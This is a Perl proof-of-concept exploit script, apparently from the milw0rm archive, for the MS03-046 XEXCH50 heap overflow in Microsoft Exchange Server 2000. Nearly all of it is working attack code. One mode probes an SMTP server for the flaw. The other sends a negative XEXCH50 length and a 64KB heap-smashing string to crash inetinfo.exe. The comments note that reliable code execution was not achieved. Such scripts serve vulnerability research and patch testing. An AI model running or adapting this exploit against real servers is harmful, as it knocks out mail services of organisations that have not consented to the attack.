Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (PoC) (MS03-046)

#!/usr/bin/perl -w
##################

##
# ms03-046.pl - hdm metasploit com
# This vulnerability allows a remote unauthenticated user to overwrite big chunks
# of the heap used by the inetinfo.exe process. Reliably exploiting this bug is
# non-trivial; even though the entire buffer is binary safe (even nulls) and can be
# just about any size, the actual code that crashes varies widely with each request.
# During the analysis process, numerous combinations of request size, concurrent
# requests, pre-allocations, and alternate trigger routes were examined and not a
# single duplicate of location and data offset was discovered. Hopefully the magic
# combination of data, size, and setup will be found to allow this bug to be reliably
# exploited.

# minor bugfix: look for 354 Send binary data

use strict;
use IO::Socket;

my $host = shift() || usage();
my $mode = shift() || "CHECK";
my $port = 25;


if (uc($mode) eq "CHECK") { check() }
if (uc($mode) eq "CRASH") { crash() }

usage();


sub check
{
    my $s = SMTP($host, $port);
    if (! $s)
    {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    print $s "XEXCH50 2 2\r\n";
    my $res = <$s>;
    close ($s);

    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res !~ /354 Send binary/i)
    {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print "[*] This system is vulnerable: $host:$port\n";

    exit(0);
}


sub crash
{
    my $s = SMTP($host, $port);
    if (! $s)
    {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    # the negative value allows us to overwrite random heap bits
    print $s "XEXCH50 -1 2\r\n";
    my $res = <$s>;

    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res !~ /354 Send binary/i)
    {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print "[*] Sending massive heap-smashing string...\n";
    print $s ("META" x 16384);

    # sometimes a second connection is required to trigger the crash
    $s = SMTP($host, $port);

    exit(0);
}


sub usage
{
    print STDERR "Usage: $0 <host> [CHECK|CRASH]\n";
    exit(0);

}

sub SMTP
{
    my ($host, $port) = @_;
    my $s = IO::Socket::INET->new
    (
        PeerAddr => $host,
        PeerPort => $port,
        Proto    => "tcp"
    ) || return(undef);

    my $r = <$s>;
    return undef if !$r;

    if ($r !~ /Microsoft/)
    {
        chomp($r);
        print STDERR "[*] This does not look like an exchange server: $r\n";
        return(undef);
    }

    print $s "HELO X\r\n";
    $r = <$s>;
    return undef if !$r;

    print $s "MAIL FROM: DoS\r\n";
    $r = <$s>;
    return undef if !$r;

    print $s "RCPT TO: Administrator\r\n";
    $r = <$s>;
    return undef if !$r;

    return($s);
}


# milw0rm.com [2003-10-22]